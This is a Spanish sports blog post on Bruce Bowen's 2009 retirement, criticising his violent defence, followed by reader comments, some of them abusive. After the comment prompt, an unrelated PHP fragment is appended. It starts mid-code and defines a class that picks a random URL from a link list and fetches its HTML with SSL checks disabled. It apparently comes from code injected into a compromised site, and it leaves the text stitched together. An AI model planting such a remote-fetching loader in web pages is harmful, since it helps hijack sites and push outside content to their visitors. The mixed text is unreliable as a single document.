Bruce Bowen se retira

04 de September de 2009 por txusma

Hay jugadores que, a pesar de que sabes que es imposible, te dan la sensación de que han estado en la NBA toda la vida y de que siempre permanecerán, incluso cuando tú dejes de verla. Bruce Bowen es uno de ellos, posiblemente por seguir en activo a los 37 años, por haber jugado 500 partidos consecutivos entre febrero de 2002 y marzo de 2008, por verlo ganar 3 anillos como pieza clave de los Spurs y, sobre todo, por aparecer periódicamente en los medios gracias a sus malas artes defensivas.  Tras su retirada, de repente se encuentra con el tiempo necesario para reflexionar sobre algunas de sus actitudes. A lo mejor algún día nos sorprende y se arrepiente de algo.

Bowen no fue elegido en el draft de 1993 y durante 4 años peregrinó por varios equipos de Francia y de la CBA. En marzo de 1997 jugó su primer partido en la NBA y se convirtió en un “trotaequipos” que pasó por los Miami Heat, los Boston Celtics, Philadelphia 76ers y Chicago Bulls. La temporada 2000-2001 fue la de su consagración en la NBA y, demostrando un gran nivel defensivo nuevamente en los Heat, fue elegido para el segundo quinteto defensivo de la temporada.

En la temporada siguiente fichó por los Spurs, donde ya se hizo mundialmente famoso. Desde ese año fue elegido 2 veces más en el segundo quinteto defensivo de la temporada y 5 más para el primero, aunque en más de una ocasión su interpretación del verbo “defender” fuera tan diferente a la de los buenos aficionados al baloncesto. A bote pronto todos recordamos la patada que propinó a Wally Szcerbiack en la cara,  su fabulosa defensa “de pie” en un partido contra los Knicks, su patada al tobillo a Amaré Stoudemire en los Playoffs de 2007 o el rodillazo a Steve Nash en sus partes bajas.

Lo siento, Bruce, pero no te echaremos de menos. El baloncesto es un poco más limpio desde hoy.

Comenta

10 comentarios a esta entrada

  1. sabas dice:
    #1

    A mi la pregunta que me surge es: ¿ por que se le permitia tanto?. Por lo demas lo dicho no se le echara de menos.

      Citar

  2. TheDeerHunter dice:
    #2

    yo solo confío en que esa horrible foto sea la última vez que le veamos el careto por estos lares

      Citar

  3. Dantley2 dice:
    #3

    Otro que no lo va a echar de menos.

      Citar

  4. Deprisa dice:
    #4

    Sí, es cierto. Es más si sigues los juegos de basket para ordenador ¡Siempre ha estado! Este es dde los que parece que es un robot que jamás envejecía…

      Citar

  5. dunc dice:
    #5

    Pues yo si le echaré de menos!!

      Citar

  6. Txusma dice:
    #6

    Como buen fan de los Spurs supongo. Le dio tiempo a enseñarle algo a Udoka? Espero que no…

      Citar

  7. Óscar dice:
    #7

    Bruce Bowen ha sido uno de los grandes especialistas defensivos de la Liga, uno de los mejores que he visto en mi vida. Yo sí le echaré de menos, y los Spurs también, aunque ya no estaba al mismo nivel que hace unos años. Con sus limitaciones técnicas (ofensivas), se ha logrado hacer con un nombre explotando sus cualidades, a semejanza del “gusano” Denis Rodman, salvando las distancias. Un hombre importante para Popovich y sus tres anillos. Sucio, sí. Efectivo e importante, también.

      Citar

  8. TheDeerHunter dice:
    #8

    Yo no dudo que Bowen haya sido importante en los anillos de los Spurs… de hecho ha hecho grandes actuaciones que no necesariamente incluían patadas en las bolas o en la cara, golpes de kárate ni piquetes de ojos…
    Pero el problema es ese… que su gran defensa se ha basado más en lo sucio que en lo efectivo. Alabar a Bowen es alabar el todo vale… y ese sería el camino de joder carreras de los que realmente mueven este tren. Las verdaderas estrellas y no este pedazo de cabrón redomado.
    Lo que más me fastidia a mí es precísamente eso… que si hubiera querido le hubieramos recordado como a un extraordinario defensor y no como a un cochino hijo de mala madre.
    Solo se recordarán los vídeos que puedes ver en este post. Ese es el resumen exacto de sus virtudes.

      Citar

  9. TheDeerHunter dice:
    #9

    Exquisito (como siempre) alegato de Gonzalo Vázquez a favor de Bowen: http://blogs.acb.com/blog/elpuntog

    En esta ocasión, aún a riesgo de caer en la blasfemia ante alguien a quien admiro tanto, no estoy de acuerdo. El punto de conflicto, entiendo, entre los que le defendís y los que directamente vomitamos en su memoria de anti-jugador es precísamente la importancia que se le da a sus más célebres “hazañas” del Youtube.
    Según Gonzalo Vázquez esos son “excedentes de kamikaze” que no deberían “erosionar la verdadera naturaleza de su legado” como excelente defensor que ha sido. Para mí precísamente esos excedentes son precísamente los que le definen (faltaría más que todas las semanas le pegara una patada en la boca al pobre de turno) y precísamente esa “destreza en el engaño” (o mejor dicho repulsiva bula y barra libre — ¿cómo se puede ocultar ese tipo de acciones??) y ese “don” en el trato diferencial es lo que le ha proporcionado los mayores honores y premios de este deporte, manchándolos y corrompiéndolos a la misma velocidad de un rodillazo en los genitales. Nunca ningún título ha estado peor representado. Deberían haber repartido los anillos a todos menos al Cerdo, haciendo esta observación en público para que aprendiera él y los que se les ocurriera ser como él.
    Rodman era desagradable en su defensa… casi todos los grandes defensores lo han sido. Pero nunca nadie que yo haya visto a mostrado tanta alegre falta de respeto a las esencias mismas de todo esto. ¿a dónde iría esto con más jugadores de su perfil?? Quizás lo sepamos pronto observando que un tuercebotas (y nunca mejor dicho) de esta magnitud puede tener una carrera tan laureada.
    Por supuesto que nada de lo que digo tendría sentido si se hubiera limitado a ser tan buen defensor como podría haber sido. El excedente nos salpica a todos de ponzoña.

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    Yo lo que más recuerdo, con perdón, son los 7 triples que metió un día a los Lakers en una eliminatoria de playoff. Bueno los triples fueron en un partido.

    Por lo demás, sí gran defensor, aunque si se hubiera ahorrado algo de violencia,,hubiesen sido declarados los partidos de los Spurs para todos los publicos y no hubiese pasado nada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>